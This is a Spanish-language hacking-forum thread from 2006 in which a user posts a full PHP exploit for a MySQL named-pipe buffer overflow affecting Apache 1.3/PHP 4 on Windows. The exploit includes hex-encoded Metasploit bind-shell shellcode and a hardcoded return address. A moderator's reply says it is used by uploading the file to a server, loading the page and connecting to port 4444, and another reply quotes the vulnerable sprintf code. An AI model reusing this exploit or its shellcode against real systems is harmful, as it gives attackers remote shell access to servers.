elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 20:29  


Tema destacado: Últimos eventos sobre seguridad/inseguridad

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  [OB] PHP4 + APACHE 1.3 ~ MYSQL BoF		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [OB] PHP4 + APACHE 1.3 ~ MYSQL BoF  (Leído 1,986 veces)
Hans el Topo


Desconectado Desconectado

Mensajes: 1.748


"Estoy cansado de no hacer nada"


Ver Perfil WWW
[OB] PHP4 + APACHE 1.3 ~ MYSQL BoF
« en: 26 Febrero 2006, 00:18 »
Alguien puede echarme una mano con este código? es que como apenas contiene comentarios no me aclaro... si alguien es tan amable de describirmelo o ayudarme a usarlo le estare muy agradecido

Código:
<?php

//Exploit for
// Apache/1.3.33
// PHP/4.4.0
//Windows only

$eip = "71AB5651";  //EIP - CALL ESI from Winsock 2.0 ws2_32.dll v5.1.2600.0
$esi = "10000000";  //ESI - Temporary. The memory under this location will be trashed.

//Metasploit win32 bind shell on port 4444
//Thread exit method, no filter
$shellcode = pack("H*","fc6aeb4de8f9ffffff608b6c24248b453c8b7c057801ef8b4f188b5f2001eb498b348b01ee31c099ac84c07407c1ca0d01c2ebf43b54242875e58b5f2401eb668b0c4b8b5f1c01eb032c8b896c241c61c331db648b43308b400c8b701cad8b40085e688e4e0eec50ffd6665366683332687773325f54ffd068cbedfc3b50ffd65f89e56681ed0802556a02ffd068d909f5ad57ffd6535353535343534353ffd06668115c665389e19568a41a70c757ffd66a105155ffd068a4ad2ee957ffd65355ffd068e549864957ffd650545455ffd09368e779c67957ffd655ffd0666a646668636d89e56a505929cc89e76a4489e231c0f3aafe422dfe422c938d7a38ababab6872feb316ff7544ffd65b57525151516a0151515551ffd068add905ce53ffd66affff37ffd08b57fc83c464ffd652ffd068efcee06053ffd6ffd0");

//Endian conversion
$eip = substr($eip, 6, 2) . substr($eip, 4, 2) . substr($eip, 2, 2) . substr($eip, 0, 2);
$esi = substr($esi, 6, 2) . substr($esi, 4, 2) . substr($esi, 2, 2) . substr($esi, 0, 2);

$overflowstring = "localhost:/";
$overflowstring .= "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
$overflowstring .= pack("H*",$eip); //EIP
$overflowstring .= pack("H*",$esi); //ESI
$overflowstring .= "/";

//If we don't define this, our shellcode gets truncated
$two = "AAAAAAAAAA";

mysql_connect($overflowstring, $shellcode);

?>
« Última modificación: 26 Febrero 2006, 05:32 por SirDarckCat » En línea
 
sch3m4
Colaborador
***
Desconectado Desconectado

Mensajes: 1.603

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: ayuda con un exploit
« Respuesta #1 en: 26 Febrero 2006, 03:42 »
es un bof que se produce al conectar en una determinada version de mysql, lee un poco a cerca de Buffer Overflow, hay info en las chinchetas del foro
En línea
OpenSec

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: [OB] PHP4 + APACHE 1.3 ~ MYSQL BoF
« Respuesta #2 en: 26 Febrero 2006, 07:05 »
Me gustó el shellcode.. busca el mismo los offsets, y no es muy grande, me costo un poco de trabajo descubrir de donde sacaba las direcciónes, asi que aprendi algo nuevo :P

Respecto a como explotarlo, pues solo lo subes al servidor, y abres la pagina.. despues te conectas al puerto 4444.

Les anexo el shellcode en ASM.

Saludos!!
En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
Hans el Topo


Desconectado Desconectado

Mensajes: 1.748


"Estoy cansado de no hacer nada"


Ver Perfil WWW
Re: [OB] PHP4 + APACHE 1.3 ~ MYSQL BoF
« Respuesta #3 en: 26 Febrero 2006, 12:30 »
gracias por la ayuda, pero he buscado Buffer Overflow y no me he enterado de mucho, lo e probado en mi localhost y el servidor se cae, voy a seguir dandole al tema ave si en toda esta semana saco algo en claro ...xd
respecto a lo de mi sugerencia de si alguien podria explicarlo paso a paso el exploit (linea a linea pa poco entendidos como yo) aligual logramos aprender con un poco más de claridad ... xd
En línea
 
sch3m4
Colaborador
***
Desconectado Desconectado

Mensajes: 1.603

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: [OB] PHP4 + APACHE 1.3 ~ MYSQL BoF
« Respuesta #4 en: 26 Febrero 2006, 12:32 »
el servidor se cae por el tema de los offsets seguramente, para usarlo en otro sistema sin ser un exploit universal vas a tener que aprender a crearlos, obviamente.
En línea
OpenSec

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
Hans el Topo


Desconectado Desconectado

Mensajes: 1.748


"Estoy cansado de no hacer nada"


Ver Perfil WWW
Re: [OB] PHP4 + APACHE 1.3 ~ MYSQL BoF
« Respuesta #5 en: 26 Febrero 2006, 12:37 »
Cita de: Lympex en 26 Febrero 2006, 12:32
el servidor se cae por el tema de los offsets seguramente, para usarlo en otro sistema sin ser un exploit universal vas a tener que aprender a crearlos, obviamente.

mi gozo en un pozo... esto se complica cada vez más...xd
En línea
 
sch3m4
Colaborador
***
Desconectado Desconectado

Mensajes: 1.603

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: [OB] PHP4 + APACHE 1.3 ~ MYSQL BoF
« Respuesta #6 en: 26 Febrero 2006, 12:40 »
te recomiendo que te leas este hilo http://foro.elhacker.net/index.php/topic,57910.0.html  ;)
En línea
OpenSec

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
Hans el Topo


Desconectado Desconectado

Mensajes: 1.748


"Estoy cansado de no hacer nada"


Ver Perfil WWW
Re: [OB] PHP4 + APACHE 1.3 ~ MYSQL BoF
« Respuesta #7 en: 26 Febrero 2006, 12:42 »
Cita de: Lympex en 26 Febrero 2006, 12:40
te recomiendo que te leas este hilo http://foro.elhacker.net/index.php/topic,57910.0.html  ;)

si muchas gracias es el manual k me he bajado con la primera sugerencia
En línea
 
s0cratex

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: [OB] PHP4 + APACHE 1.3 ~ MYSQL BoF
« Respuesta #8 en: 26 Febrero 2006, 16:11 »
Aquí hay información detallada del bug.
http://lists.grok.org.uk/pipermail/full-disclosure/2006-January/041013.html

---------------------------------------------------------------
\ext\mysql\libmysql\libmysql.c line 216:

HANDLE create_named_pipe(NET *net, uint connect_timeout, char
**arg_host,
          char **arg_unix_socket)
{
   [...]
   char szPipeName [ 257 ];
   [...]
   sprintf( szPipeName, "\\\\%s\\pipe\\%s", host, unix_socket);

------------------------------------------------------------------

ya vieron el problema??, Supongo que el número de X es por ejemplo 258
bueno la shellcode es de metasploit, lo raro del bug es que haya surgido hasta hace poco.
« Última modificación: 26 Febrero 2006, 16:13 por S0cr@t3X » En línea
------------------------------------
.:[| s0cratex security crazy |]:.
------------------------------------
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Php , Mysql y Apache en OpenSuse 11.4?
PHP 		R3tr0 2 2,323 Último mensaje 10 Marzo 2011, 20:54
por Nakp
Las webs basadas en Linux, Apache, MySQL y PHP son las principales dianas del...
Noticias 		wolfbcn 1 662 Último mensaje 10 Junio 2011, 18:34
por El As del Club Paris
Distribución linux con Apache y MYSQL
GNU/Linux 		OssoH 6 770 Último mensaje 13 Octubre 2011, 16:21
por OssoH
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines